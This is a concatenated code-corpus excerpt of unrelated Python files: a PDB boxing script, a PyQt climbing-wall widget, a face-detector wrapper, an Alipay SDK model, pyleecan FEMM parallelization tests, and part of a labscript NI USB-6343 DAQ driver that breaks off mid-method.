644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
iotbx/command_line/pdb.box_around_molecule.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
from __future__ import division
import sys
from cctbx import uctbx
import iotbx.pdb
from libtbx.option_parser import option_parser
import libtbx.load_env
from libtbx.str_utils import show_string
from libtbx.utils import date_and_time
import mmtbx.model
def run(args):
log = sys.stdout
if (len(args) == 0): args = ["--help"]
command_line = (option_parser(
usage="%s [options] pdb_file" % libtbx.env.dispatcher_name)
.option(None, "--buffer_layer",
action="store",
type="float",
default=5)
).process(args=args, nargs=1)
pdb_inp = iotbx.pdb.input(file_name=command_line.args[0])
model = mmtbx.model.manager(
model_input = pdb_inp)
box = uctbx.non_crystallographic_unit_cell_with_the_sites_in_its_center(
sites_cart=model.get_sites_cart(),
buffer_layer=command_line.options.buffer_layer)
model.set_sites_cart(box.sites_cart)
# Bad hack, never repeat. In fact, all the boxing functionality should
# go into mmtbx.model.manager
model._crystal_symmetry = box.crystal_symmetry()
print >> log, 'REMARK %s --buffer-layer=%.6g %s' % (
libtbx.env.dispatcher_name,
command_line.options.buffer_layer,
show_string(command_line.args[0]))
print >> log, 'REMARK %s' % date_and_time()
print >> log, model.model_as_pdb()
if (__name__ == "__main__"):
run(sys.argv[1:])
| 32.512195
| 74
| 0.727682
|
dfa509f9568377b1ff1205997263da43054a7b7b
| 3,508
|
py
|
Python
|
src/gui_wall_widget.py
|
LiamTyler/ClimbingWallLEDController
|
99e65ab44e9bd84ac3dbe76ba4a3d66f24ba3c9e
|
[
"MIT"
] | null | null | null |
src/gui_wall_widget.py
|
LiamTyler/ClimbingWallLEDController
|
99e65ab44e9bd84ac3dbe76ba4a3d66f24ba3c9e
|
[
"MIT"
] | null | null | null |
src/gui_wall_widget.py
|
LiamTyler/ClimbingWallLEDController
|
99e65ab44e9bd84ac3dbe76ba4a3d66f24ba3c9e
|
[
"MIT"
] | null | null | null |
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from routes import *
STENCIL_FONT = QFont( QFont( 'Arial', 16 ) )
STENCIL_FONT.setBold( True )
class WallHold( QWidget ):
def __init__( self, row, col, editable = False ):
super().__init__()
self.setFixedSize( QSize( 40, 40 ) )
self.row = row
self.col = col
self.status = HoldStatus.UNUSED
self.editable = editable
def GetCoord( self ):
return chr( 65 + self.col ) + str( self.row + 1 )
def paintEvent( self, event ):
p = QPainter( self )
rect = event.rect()
color = Qt.white
if self.status == HoldStatus.START:
color = Qt.green
elif self.status == HoldStatus.REGULAR:
color = Qt.blue
elif self.status == HoldStatus.FINISH:
color = Qt.red
p.fillRect( rect, QBrush( color ) )
pen = QPen( color )
pen.setWidth( 0 )
p.setPen( pen )
p.drawRect( rect )
def mouseReleaseEvent( self, e ):
if self.editable:
self.status = (self.status + 1) % HoldStatus.COUNT
self.update()
class WallStencil( QWidget ):
def __init__( self, text ):
super().__init__()
self.text = text
self.setFixedSize( QSize( 40, 40 ) )
def paintEvent(self, event):
qp = QPainter( self )
qp.setRenderHint( QPainter.Antialiasing )
qp.setPen( Qt.black )
qp.setFont( STENCIL_FONT )
qp.drawText( event.rect(), Qt.AlignCenter, self.text )
class WallWidget( QWidget ):
def __init__( self ):
super().__init__()
self.gridLayout = QGridLayout()
self.setLayout( self.gridLayout )
self.setSizePolicy( QSizePolicy.Policy.Fixed, QSizePolicy.Policy.Fixed )
#self.setSpacing( 5 )
# grid starts in upper left corner, but wall starts in lower left
for row in range( 0, WALL_ROWS + 1 ):
for col in range( 0, WALL_COLS + 1 ):
wallRow = WALL_ROWS - row
w = None
if row > 0 and col == 0:
w = WallStencil( str( wallRow + 1 ) )
elif row == 0 and col > 0:
w = WallStencil( chr( 65 + col - 1 ) )
elif row > 0 and col > 0:
w = WallHold( wallRow, col - 1, False )
if w != None:
self.gridLayout.addWidget( w, row, col )
def SetEditable( self, isEditable ):
for row in range( 0, WALL_ROWS ):
for col in range( 0, WALL_COLS ):
self.gridLayout.itemAtPosition( row + 1, col + 1 ).widget().editable = isEditable
def DrawRoute( self, route ):
for row in range( 0, WALL_ROWS ):
for col in range( 0, WALL_COLS ):
self.gridLayout.itemAtPosition( row + 1, col + 1 ).widget().status = HoldStatus.UNUSED
for hold in route.holds:
wallRow = WALL_ROWS - hold.row
self.gridLayout.itemAtPosition( wallRow, hold.col + 1 ).widget().status = hold.status
def GetCurrentlyDrawnHolds( self ):
holds = []
for row in range( 0, WALL_ROWS ):
for col in range( 0, WALL_COLS ):
w = self.gridLayout.itemAtPosition( row + 1, col + 1 ).widget()
if w.status != HoldStatus.UNUSED:
holds.append( Hold( w.row, w.col, w.status ) )
return holds
| 34.732673
| 102
| 0.547891
|
317fd8b22d2428aa9dff95d98505d7e70f02706e
| 1,933
|
py
|
Python
|
src/face_detector.py
|
yariv1025/FACIAL_EMOTION_RECOGNITION
|
1141912271a6ed336db60856552e20282dfd6a60
|
[
"MIT"
] | null | null | null |
src/face_detector.py
|
yariv1025/FACIAL_EMOTION_RECOGNITION
|
1141912271a6ed336db60856552e20282dfd6a60
|
[
"MIT"
] | 4
|
2021-03-04T10:07:49.000Z
|
2021-03-04T15:31:10.000Z
|
src/face_detector.py
|
yariv1025/EmotionRec
|
1141912271a6ed336db60856552e20282dfd6a60
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from mtcnn.mtcnn import MTCNN
class FaceDetector(MTCNN):
"""
Perform facial detection.
"""
def __init__(self):
"""
Creating FaceDetector object by calling to the super class constructor (MTCNN).
"""
super().__init__()
self.no_face_time = 0
self.temp_timer = None
self.prev = True
def get_face(self, img):
"""
Detects faces in an image.
If faces has been detected, returning the bounding boxes for the faces relative to the specified image.
Else, return an empty list.
:param img: image/frame to process.
:return: list containing all the bounding boxes detected with their key-points.
"""
return self.detect_faces(img)
def has_face(self, img):
"""
Face verification within an image.
:param img: image/frame to process.
:return: boolean value - False if theres no face. Else, True.
"""
faces = self.get_face(img)
if len(faces) > 0 and self.prev:
return faces
elif len(faces) > 0 and not self.prev:
self.prev = True
self.stop_timer()
return faces
elif len(faces) == 0 and self.prev:
self.prev = False
self.start_timer()
return False
elif len(faces) == 0 and not self.prev:
return False
def start_timer(self):
"""
Initializes the timer to count when no faces are detected in the image.
"""
self.temp_timer = datetime.now()
return self.temp_timer
def stop_timer(self):
"""
Calculate the entire time theres no faces are detected in the image.
"""
self.no_face_time = self.no_face_time + (datetime.now() - self.temp_timer).total_seconds()
self.temp_timer = None
return self.temp_timer
| 29.738462
| 111
| 0.588205
|
2182c65c56102f99f82fd0c563332a054b4d2ee7
| 1,795
|
py
|
Python
|
alipay/aop/api/domain/KoubeiMerchantDepartmentTreeQueryModel.py
|
articuly/alipay-sdk-python-all
|
0259cd28eca0f219b97dac7f41c2458441d5e7a6
|
[
"Apache-2.0"
] | null | null | null |
alipay/aop/api/domain/KoubeiMerchantDepartmentTreeQueryModel.py
|
articuly/alipay-sdk-python-all
|
0259cd28eca0f219b97dac7f41c2458441d5e7a6
|
[
"Apache-2.0"
] | null | null | null |
alipay/aop/api/domain/KoubeiMerchantDepartmentTreeQueryModel.py
|
articuly/alipay-sdk-python-all
|
0259cd28eca0f219b97dac7f41c2458441d5e7a6
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import simplejson as json
from alipay.aop.api.constant.ParamConstants import *
class KoubeiMerchantDepartmentTreeQueryModel(object):
def __init__(self):
self._auth_code = None
self._dept_id = None
self._type = None
@property
def auth_code(self):
return self._auth_code
@auth_code.setter
def auth_code(self, value):
self._auth_code = value
@property
def dept_id(self):
return self._dept_id
@dept_id.setter
def dept_id(self, value):
self._dept_id = value
@property
def type(self):
return self._type
@type.setter
def type(self, value):
self._type = value
def to_alipay_dict(self):
params = dict()
if self.auth_code:
if hasattr(self.auth_code, 'to_alipay_dict'):
params['auth_code'] = self.auth_code.to_alipay_dict()
else:
params['auth_code'] = self.auth_code
if self.dept_id:
if hasattr(self.dept_id, 'to_alipay_dict'):
params['dept_id'] = self.dept_id.to_alipay_dict()
else:
params['dept_id'] = self.dept_id
if self.type:
if hasattr(self.type, 'to_alipay_dict'):
params['type'] = self.type.to_alipay_dict()
else:
params['type'] = self.type
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = KoubeiMerchantDepartmentTreeQueryModel()
if 'auth_code' in d:
o.auth_code = d['auth_code']
if 'dept_id' in d:
o.dept_id = d['dept_id']
if 'type' in d:
o.type = d['type']
return o
| 25.28169
| 69
| 0.56546
|
015fa1833f42898327317629bf34ca5071e4d3b4
| 7,531
|
py
|
Python
|
Tests/Validation/Magnetics/test_FEMM_parallelization.py
|
EmileDvs/pyleecan
|
ad2f5f25c089a981f373557a198da51c62407928
|
[
"Apache-2.0"
] | 95
|
2019-01-23T04:19:45.000Z
|
2022-03-17T18:22:10.000Z
|
Tests/Validation/Magnetics/test_FEMM_parallelization.py
|
EmileDvs/pyleecan
|
ad2f5f25c089a981f373557a198da51c62407928
|
[
"Apache-2.0"
] | 366
|
2019-02-20T07:15:08.000Z
|
2022-03-31T13:37:23.000Z
|
Tests/Validation/Magnetics/test_FEMM_parallelization.py
|
EmileDvs/pyleecan
|
ad2f5f25c089a981f373557a198da51c62407928
|
[
"Apache-2.0"
] | 74
|
2019-01-24T01:47:31.000Z
|
2022-02-25T05:44:42.000Z
|
from os.path import join
from time import time
import pytest
from numpy import array, pi
from numpy.testing import assert_allclose
from Tests import save_validation_path as save_path
from pyleecan.Classes.ImportGenVectLin import ImportGenVectLin
from pyleecan.Classes.ImportMatrixVal import ImportMatrixVal
from pyleecan.Classes.InputCurrent import InputCurrent
from pyleecan.Classes.MagFEMM import MagFEMM
from pyleecan.Classes.Simu1 import Simu1
from pyleecan.Functions.load import load
from pyleecan.Functions.Plot import dict_2D
from pyleecan.definitions import DATA_DIR
@pytest.mark.long_5s
@pytest.mark.MagFEMM
@pytest.mark.IPMSM
@pytest.mark.parallel
@pytest.mark.periodicity
@pytest.mark.SingleOP
def test_FEMM_parallelization_mag():
"""test parallelization of FEMM to get B, Tem, PhiWind"""
Toyota_Prius = load(join(DATA_DIR, "Machine", "Toyota_Prius.json"))
simu = Simu1(name="test_FEMM_parallelization_mag", machine=Toyota_Prius)
# Definition of a sinusoidal current
simu.input = InputCurrent()
simu.input.Id_ref = -100 # [A]
simu.input.Iq_ref = 200 # [A]
simu.input.Nt_tot = 16 # Number of time step
simu.input.Na_tot = 1024 # Spatial discretization
simu.input.N0 = 2000 # Rotor speed [rpm]
# Definition of the magnetic simulation
simu.mag = MagFEMM(
type_BH_stator=2,
type_BH_rotor=2,
is_periodicity_a=True,
is_periodicity_t=True,
)
simu2 = simu.copy()
simu2.mag.nb_worker = 2
start = time()
out = simu.run()
time1 = time() - start
start = time()
out2 = simu2.run()
time2 = time() - start
print(
"Execution with one worker: {:.1f}s ||| {:d} workers {:.1f}".format(
time1, simu2.mag.nb_worker, time2
)
)
# simlation with Nt_tot < nb_worker
simu3 = simu.copy()
simu3.mag.nb_worker = 8
simu3.input.Nt_tot = 4
simu3.run()
# Plot the result by comparing the first two simulation
out.mag.B.plot_2D_Data(
"angle{°}",
"time[0]",
data_list=[out2.mag.B],
legend_list=["Serial", "Parallelization"],
save_path=join(save_path, simu.name + "_B_t0.png"),
is_show_fig=False,
**dict_2D
)
out.mag.B.plot_2D_Data(
"angle{°}",
"time[0]",
data_list=[out2.mag.B],
legend_list=["Serial", "Parallelization"],
save_path=join(save_path, simu.name + "_B_t1.png"),
is_show_fig=False,
**dict_2D
)
out.mag.Tem.plot_2D_Data(
"time",
data_list=[out2.mag.Tem],
legend_list=["Periodic", "Full"],
save_path=join(save_path, simu.name + "_Tem.png"),
is_show_fig=False,
**dict_2D
)
out.mag.Phi_wind_stator.plot_2D_Data(
"time",
"phase",
data_list=[out2.mag.Phi_wind_stator],
legend_list=["Periodic", "Full"],
save_path=join(save_path, simu.name + "_Phi_wind_stator.png"),
is_show_fig=False,
**dict_2D
)
assert_allclose(
out.mag.B.components["tangential"].values,
out2.mag.B.components["tangential"].values,
rtol=1e-5,
atol=1e-6,
)
assert_allclose(
out.mag.B.components["radial"].values,
out2.mag.B.components["radial"].values,
rtol=1e-5,
atol=1e-5,
)
assert_allclose(out.mag.Tem.values, out2.mag.Tem.values, rtol=1e-5, atol=1e-5)
return out, out2
@pytest.mark.long_5s
@pytest.mark.MagFEMM
@pytest.mark.SPMSM
@pytest.mark.parallel
@pytest.mark.MeshSol
@pytest.mark.periodicity
@pytest.mark.SingleOP
def test_FEMM_parallelization_meshsolution():
"""test parallelization of FEMM to get meshsolution"""
SPMSM_003 = load(join(DATA_DIR, "Machine", "SPMSM_003.json"))
simu = Simu1(name="test_FEMM_parallelization_meshsolution", machine=SPMSM_003)
# Definition of the enforced output of the electrical module
N0 = 3000
Is = ImportMatrixVal(
value=array(
[
[6.97244193e-06, 2.25353053e02, -2.25353060e02],
[-2.60215295e02, 1.30107654e02, 1.30107642e02],
[-6.97244208e-06, -2.25353053e02, 2.25353060e02],
[2.60215295e02, -1.30107654e02, -1.30107642e02],
]
)
)
time = ImportGenVectLin(start=0, stop=0.015, num=4, endpoint=True)
angle = ImportGenVectLin(start=0, stop=2 * pi, num=1024, endpoint=False)
simu.input = InputCurrent(
Is=Is,
Ir=None, # No winding on the rotor
N0=N0,
angle_rotor=None, # Will be computed
time=time,
angle=angle,
angle_rotor_initial=0.5216 + pi,
)
# Definition of the magnetic simulation (no symmetry)
simu.mag = MagFEMM(
type_BH_stator=2,
type_BH_rotor=2,
is_periodicity_a=False,
is_periodicity_t=False,
is_get_meshsolution=True,
nb_worker=1,
)
simu.force = None
simu.struct = None
simu2 = simu.copy()
simu2.mag.nb_worker = 3
simu2.name += "_parallel"
out = simu.run()
out2 = simu2.run()
# %%
# Plots solution computed without parallelization
out.mag.meshsolution.plot_mesh(
save_path=join(save_path, simu.name + "_mesh_not_parallel.png"),
is_show_fig=False,
)
out.mag.meshsolution.plot_mesh(
group_names="stator core",
save_path=join(save_path, simu.name + "_mesh_stator_not_parallel.png"),
is_show_fig=False,
)
out.mag.meshsolution.plot_mesh(
group_names=["stator core", "/", "airgap", "stator winding"],
save_path=join(
save_path,
simu.name + "_mesh_stator_interface_not_parallel.png",
),
is_show_fig=False,
)
out.mag.meshsolution.plot_contour(
label="\mu",
save_path=join(save_path, simu.name + "_mu_not_parallel.png"),
is_show_fig=False,
)
out.mag.meshsolution.plot_contour(
label="B",
save_path=join(save_path, simu.name + "_B_not_parallel.png"),
is_show_fig=False,
)
out.mag.meshsolution.plot_contour(
label="H",
save_path=join(save_path, simu.name + "_H_not_parallel.png"),
is_show_fig=False,
)
# %%
# Plots solution computed with parallelization
out2.mag.meshsolution.plot_mesh(
save_path=join(save_path, simu.name + "_mesh_parallel.png"), is_show_fig=False
)
out2.mag.meshsolution.plot_mesh(
group_names="stator core",
save_path=join(save_path, simu.name + "_mesh_stator_parallel.png"),
is_show_fig=False,
)
out2.mag.meshsolution.plot_mesh(
group_names=["stator core", "/", "airgap", "stator winding"],
save_path=join(
save_path,
simu.name + "_mesh_stator_interface_parallel.png",
),
is_show_fig=False,
)
out2.mag.meshsolution.plot_contour(
label="\mu",
save_path=join(save_path, simu.name + "_mu_parallel.png"),
is_show_fig=False,
)
out2.mag.meshsolution.plot_contour(
label="B",
save_path=join(save_path, simu.name + "_B_parallel.png"),
is_show_fig=False,
)
out2.mag.meshsolution.plot_contour(
label="H",
save_path=join(save_path, simu.name + "_H_parallel.png"),
is_show_fig=False,
)
return out, out2
if __name__ == "__main__":
out, out2 = test_FEMM_parallelization_mag()
# out3, out4 = test_FEMM_parallelization_meshsolution()
| 28.31203
| 86
| 0.634577
|
0952f0fb396ba9a4ae41dfb0b7528e4b2e337e91
| 39,307
|
py
|
Python
|
labscript_devices/NI_USB_6343.py
|
specialforcea/labscript_suite
|
a4ad5255207cced671990fff94647b1625aa0049
|
[
"BSD-2-Clause"
] | null | null | null |
labscript_devices/NI_USB_6343.py
|
specialforcea/labscript_suite
|
a4ad5255207cced671990fff94647b1625aa0049
|
[
"BSD-2-Clause"
] | null | null | null |
labscript_devices/NI_USB_6343.py
|
specialforcea/labscript_suite
|
a4ad5255207cced671990fff94647b1625aa0049
|
[
"BSD-2-Clause"
] | null | null | null |
#####################################################################
# #
# /NI_USB_6343.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the module labscript_devices, in the #
# labscript suite (see http://labscriptsuite.org), and is #
# licensed under the Simplified BSD License. See the license.txt #
# file in the root of the project for the full license. #
# #
#####################################################################
from labscript import LabscriptError
from labscript_devices import labscript_device, BLACS_tab, BLACS_worker, runviewer_parser
from labscript import AnalogOut, StaticAnalogOut, DigitalOut, StaticDigitalOut, AnalogIn
import labscript_devices.NIBoard as parent
import numpy as np
import labscript_utils.h5_lock, h5py
import labscript_utils.properties
@labscript_device
class NI_USB_6343(parent.NIBoard):
description = 'NI-USB-6343'
def __init__(self, name, parent_device, **kwargs):
parent.NIBoard.__init__(self, name, parent_device, call_parents_add_device=False, **kwargs)
self.allowed_children = [AnalogOut, DigitalOut, AnalogIn]
self.num_AO = 4
self.num_DO = 32
self.dtype_DO = np.uint32
self.num_AI = 32
self.clock_limit = 700e3
# Now call this to get the clock right
self.parent_device.add_device(self)
import time
from blacs.tab_base_classes import Worker, define_state
from blacs.tab_base_classes import MODE_MANUAL, MODE_TRANSITION_TO_BUFFERED, MODE_TRANSITION_TO_MANUAL, MODE_BUFFERED
from blacs.device_base_class import DeviceTab
@BLACS_tab
class NI_USB_6343Tab(DeviceTab):
def initialise_GUI(self):
# Capabilities
num = {'AO':4, 'DO':32, 'PFI':16}
base_units = {'AO':'V'}
base_min = {'AO':-10.0}
base_max = {'AO':10.0}
base_step = {'AO':0.1}
base_decimals = {'AO':3}
# Create the AO output objects
ao_prop = {}
for i in range(num['AO']):
ao_prop['ao%d'%i] = {'base_unit':base_units['AO'],
'min':base_min['AO'],
'max':base_max['AO'],
'step':base_step['AO'],
'decimals':base_decimals['AO']
}
do_prop = {}
for i in range(num['DO']):
do_prop['port0/line%d'%i] = {}
pfi_prop = {}
for i in range(num['PFI']):
pfi_prop['PFI %d'%i] = {}
# Create the output objects
self.create_analog_outputs(ao_prop)
# Create widgets for analog outputs only
dds_widgets,ao_widgets,do_widgets = self.auto_create_widgets()
# now create the digital output objects
self.create_digital_outputs(do_prop)
self.create_digital_outputs(pfi_prop)
# manually create the digital output widgets so they are grouped separately
do_widgets = self.create_digital_widgets(do_prop)
pfi_widgets = self.create_digital_widgets(pfi_prop)
def do_sort(channel):
flag = channel.replace('port0/line','')
flag = int(flag)
return '%02d'%(flag)
def pfi_sort(channel):
flag = channel.replace('PFI ','')
flag = int(flag)
return '%02d'%(flag)
# and auto place the widgets in the UI
self.auto_place_widgets(("Analog Outputs",ao_widgets),("Digital Outputs",do_widgets,do_sort),("PFI Outputs",pfi_widgets,pfi_sort))
# Store the Measurement and Automation Explorer (MAX) name
self.MAX_name = str(self.settings['connection_table'].find_by_name(self.device_name).BLACS_connection)
# Create and set the primary worker
self.create_worker("main_worker",NI_USB_6343Worker,{'MAX_name':self.MAX_name, 'limits': [base_min['AO'],base_max['AO']], 'num':num})
self.primary_worker = "main_worker"
self.create_worker("wait_monitor_worker",NI_USB_6343WaitMonitorWorker,{'MAX_name':self.MAX_name})
self.add_secondary_worker("wait_monitor_worker")
self.create_worker("acquisition_worker",NI_USB_6343AcquisitionWorker,{'MAX_name':self.MAX_name})
self.add_secondary_worker("acquisition_worker")
# Set the capabilities of this device
self.supports_remote_value_check(False)
self.supports_smart_programming(False)
@BLACS_worker
class NI_USB_6343Worker(Worker):
def init(self):
exec 'from PyDAQmx import Task, DAQmxResetDevice' in globals()
exec 'from PyDAQmx.DAQmxConstants import *' in globals()
exec 'from PyDAQmx.DAQmxTypes import *' in globals()
global pylab; import pylab
global numpy; import numpy
global h5py; import labscript_utils.h5_lock, h5py
import zprocess.locking
import socket
# Setup lock for NIDAQmx_calls on this machine
key = socket.gethostname() + '-NI_DAQ_API'
self.NIDAQ_API_lock = zprocess.locking.Lock(key)
with self.NIDAQ_API_lock:
# Reset Device
DAQmxResetDevice(self.MAX_name)
# Create task
self.ao_task = Task()
self.ao_read = int32()
self.ao_data = numpy.zeros((self.num['AO'],), dtype=numpy.float64)
# Create DO task:
self.do_task = Task()
self.do_read = int32()
self.do_data = numpy.zeros(self.num['DO']+self.num['PFI'],dtype=numpy.uint8)
self.setup_static_channels()
#DAQmx Start Code
self.ao_task.StartTask()
self.do_task.StartTask()
def setup_static_channels(self):
#setup AO channels
for i in range(self.num['AO']):
self.ao_task.CreateAOVoltageChan(self.MAX_name+"/ao%d"%i,"",self.limits[0],self.limits[1],DAQmx_Val_Volts,None)
#setup DO ports
self.do_task.CreateDOChan(self.MAX_name+"/port0/line0:7","",DAQmx_Val_ChanForAllLines)
self.do_task.CreateDOChan(self.MAX_name+"/port0/line8:15","",DAQmx_Val_ChanForAllLines)
self.do_task.CreateDOChan(self.MAX_name+"/port0/line16:23","",DAQmx_Val_ChanForAllLines)
self.do_task.CreateDOChan(self.MAX_name+"/port0/line24:31","",DAQmx_Val_ChanForAllLines)
self.do_task.CreateDOChan(self.MAX_name+"/port1/line0:7","",DAQmx_Val_ChanForAllLines)
self.do_task.CreateDOChan(self.MAX_name+"/port2/line0:7","",DAQmx_Val_ChanForAllLines)
def shutdown(self):
self.ao_task.StopTask()
self.ao_task.ClearTask()
self.do_task.StopTask()
self.do_task.ClearTask()
def program_manual(self,front_panel_values):
for i in range(self.num['AO']):
self.ao_data[i] = front_panel_values['ao%d'%i]
self.ao_task.WriteAnalogF64(1,True,1,DAQmx_Val_GroupByChannel,self.ao_data,byref(self.ao_read),None)
for i in range(self.num['DO']):
self.do_data[i] = front_panel_values['port0/line%d'%i]
for i in range(self.num['PFI']):
self.do_data[i+self.num['DO']] = front_panel_values['PFI %d'%i]
self.do_task.WriteDigitalLines(1,True,1,DAQmx_Val_GroupByChannel,self.do_data,byref(self.do_read),None)
# TODO: return coerced/quantised values
return {}
def transition_to_buffered(self,device_name,h5file,initial_values,fresh):
# Store the initial values in case we have to abort and restore them:
self.initial_values = initial_values
with h5py.File(h5file,'r') as hdf5_file:
group = hdf5_file['devices/'][device_name]
device_properties = labscript_utils.properties.get(hdf5_file, device_name, 'device_properties')
connection_table_properties = labscript_utils.properties.get(hdf5_file, device_name, 'connection_table_properties')
clock_terminal = connection_table_properties['clock_terminal']
h5_data = group.get('ANALOG_OUTS')
if h5_data:
self.buffered_using_analog = True
ao_channels = device_properties['analog_out_channels']
# We use all but the last sample (which is identical to the
# second last sample) in order to ensure there is one more
# clock tick than there are samples. The 6733 requires this
# to determine that the task has completed.
ao_data = pylab.array(h5_data,dtype=float64)[:-1,:]
else:
self.buffered_using_analog = False
h5_data = group.get('DIGITAL_OUTS')
if h5_data:
self.buffered_using_digital = True
do_channels = device_properties['digital_lines']
# See comment above for ao_channels
do_bitfield = numpy.array(h5_data,dtype=numpy.uint32)[:-1]
else:
self.buffered_using_digital = False
final_values = {}
# We must do digital first, so as to make sure the manual mode task is stopped, or reprogrammed, by the time we setup the AO task
# this is because the clock_terminal PFI must be freed!
with self.NIDAQ_API_lock:
if self.buffered_using_digital:
# Expand each bitfield int into self.num['DO']
# (32) individual ones and zeros:
do_write_data = numpy.zeros((do_bitfield.shape[0],self.num['DO']),dtype=numpy.uint8)
for i in range(self.num['DO']):
do_write_data[:,i] = (do_bitfield & (1 << i)) >> i
self.do_task.StopTask()
self.do_task.ClearTask()
self.do_task = Task()
self.do_read = int32()
self.do_task.CreateDOChan(do_channels,"",DAQmx_Val_ChanPerLine)
self.do_task.CfgSampClkTiming(clock_terminal,500000,DAQmx_Val_Rising,DAQmx_Val_FiniteSamps,do_bitfield.shape[0])
self.do_task.WriteDigitalLines(do_bitfield.shape[0],False,10.0,DAQmx_Val_GroupByScanNumber,do_write_data,self.do_read,None)
self.do_task.StartTask()
for i in range(self.num['DO']):
final_values['port0/line%d'%i] = do_write_data[-1,i]
else:
# We still have to stop the task to make the
# clock flag available for buffered analog output, or the wait monitor:
self.do_task.StopTask()
self.do_task.ClearTask()
if self.buffered_using_analog:
self.ao_task.StopTask()
self.ao_task.ClearTask()
self.ao_task = Task()
ao_read = int32()
self.ao_task.CreateAOVoltageChan(ao_channels,"",-10.0,10.0,DAQmx_Val_Volts,None)
self.ao_task.CfgSampClkTiming(clock_terminal,500000,DAQmx_Val_Rising,DAQmx_Val_FiniteSamps, ao_data.shape[0])
self.ao_task.WriteAnalogF64(ao_data.shape[0],False,10.0,DAQmx_Val_GroupByScanNumber, ao_data,ao_read,None)
self.ao_task.StartTask()
# Final values here are a dictionary of values, keyed by channel:
channel_list = [channel.split('/')[1] for channel in ao_channels.split(', ')]
for channel, value in zip(channel_list, ao_data[-1,:]):
final_values[channel] = value
else:
# we should probabaly still stop the task (this makes it easier to setup the task later)
self.ao_task.StopTask()
self.ao_task.ClearTask()
return final_values
def transition_to_manual(self,abort=False):
# if aborting, don't call StopTask since this throws an
# error if the task hasn't actually finished!
if self.buffered_using_analog:
if not abort:
self.ao_task.StopTask()
self.ao_task.ClearTask()
if self.buffered_using_digital:
if not abort:
self.do_task.StopTask()
self.do_task.ClearTask()
self.ao_task = Task()
self.do_task = Task()
self.setup_static_channels()
self.ao_task.StartTask()
self.do_task.StartTask()
if abort:
# Reprogram the initial states:
self.program_manual(self.initial_values)
return True
def abort_transition_to_buffered(self):
# TODO: untested
return self.transition_to_manual(True)
def abort_buffered(self):
# TODO: untested
return self.transition_to_manual(True)
class NI_USB_6343AcquisitionWorker(Worker):
def init(self):
#exec 'import traceback' in globals()
exec 'from PyDAQmx import Task' in globals()
exec 'from PyDAQmx.DAQmxConstants import *' in globals()
exec 'from PyDAQmx.DAQmxTypes import *' in globals()
global h5py; import labscript_utils.h5_lock, h5py
global numpy; import numpy
global threading; import threading
global zprocess; import zprocess
global logging; import logging
global time; import time
self.task_running = False
self.daqlock = threading.Condition()
# Channel details
self.channels = []
self.rate = 1000.
self.samples_per_channel = 1000
self.ai_start_delay = 25e-9
self.h5_file = ""
self.buffered_channels = []
self.buffered_rate = 0
self.buffered = False
self.buffered_data = None
self.buffered_data_list = []
self.task = None
self.abort = False
# And event for knowing when the wait durations are known, so that we may use them
# to chunk up acquisition data:
self.wait_durations_analysed = zprocess.Event('wait_durations_analysed')
self.daqmx_read_thread = threading.Thread(target=self.daqmx_read)
self.daqmx_read_thread.daemon = True
self.daqmx_read_thread.start()
def shutdown(self):
if self.task_running:
self.stop_task()
def daqmx_read(self):
logger = logging.getLogger('BLACS.%s_%s.acquisition.daqmxread'%(self.device_name,self.worker_name))
logger.info('Starting')
#first_read = True
try:
while True:
with self.daqlock:
logger.debug('Got daqlock')
while not self.task_running:
logger.debug('Task isn\'t running. Releasing daqlock and waiting to reacquire it.')
self.daqlock.wait()
#logger.debug('Reading data from analogue inputs')
if self.buffered:
chnl_list = self.buffered_channels
else:
chnl_list = self.channels
try:
error = "Task did not return an error, but it should have"
acquisition_timeout = 5
error = self.task.ReadAnalogF64(self.samples_per_channel,acquisition_timeout,DAQmx_Val_GroupByChannel,self.ai_data,self.samples_per_channel*len(chnl_list),byref(self.ai_read),None)
#logger.debug('Reading complete')
if error is not None and error != 0:
if error < 0:
raise Exception(error)
if error > 0:
logger.warning(error)
except Exception as e:
logger.exception('acquisition error')
if self.abort:
# If an abort is in progress, then we expect an exception here. Don't raise it.
logger.debug('ignoring error since an abort is in progress.')
# Ensure the next iteration of this while loop
# doesn't happen until the task is restarted.
# The thread calling self.stop_task() is
# also setting self.task_running = False
# right about now, but we don't want to rely
# on it doing so in time. Doing it here too
# avoids a race condition.
self.task_running = False
continue
else:
# Error was likely a timeout error...some other device might be bing slow
# transitioning to buffered, so we haven't got our start trigger yet.
# Keep trying until task_running is False:
continue
# send the data to the queue
if self.buffered:
# rearrange ai_data into correct form
data = numpy.copy(self.ai_data)
self.buffered_data_list.append(data)
#if len(chnl_list) > 1:
# data.shape = (len(chnl_list),self.ai_read.value)
# data = data.transpose()
#self.buffered_data = numpy.append(self.buffered_data,data,axis=0)
else:
pass
# Todo: replace this with zmq pub plus a broker somewhere so things can subscribe to channels
# and get their data without caring what process it came from. For the sake of speed, this
# should use the numpy buffer interface and raw zmq messages, and not the existing event system
# that zprocess has.
# self.result_queue.put([self.t0,self.rate,self.ai_read.value,len(self.channels),self.ai_data])
# self.t0 = self.t0 + self.samples_per_channel/self.rate
except:
message = traceback.format_exc()
logger.error('An exception happened:\n %s'%message)
#self.to_parent.put(['error', message])
# TODO: Tell the GUI process that this has a problem some how (status check?)
def setup_task(self):
self.logger.debug('setup_task')
#DAQmx Configure Code
with self.daqlock:
self.logger.debug('setup_task got daqlock')
if self.task:
self.task.ClearTask()##
if self.buffered:
chnl_list = self.buffered_channels
rate = self.buffered_rate
else:
chnl_list = self.channels
rate = self.rate
if len(chnl_list) < 1:
return
if rate < 1000:
self.samples_per_channel = int(rate)
else:
self.samples_per_channel = 1000
try:
self.task = Task()
except Exception as e:
self.logger.error(str(e))
self.ai_read = int32()
self.ai_data = numpy.zeros((self.samples_per_channel*len(chnl_list),), dtype=numpy.float64)
for chnl in chnl_list:
self.task.CreateAIVoltageChan(chnl,"",DAQmx_Val_RSE,-10.0,10.0,DAQmx_Val_Volts,None)
self.task.CfgSampClkTiming("",rate,DAQmx_Val_Rising,DAQmx_Val_ContSamps,1000)
if self.buffered:
#set up start on digital trigger
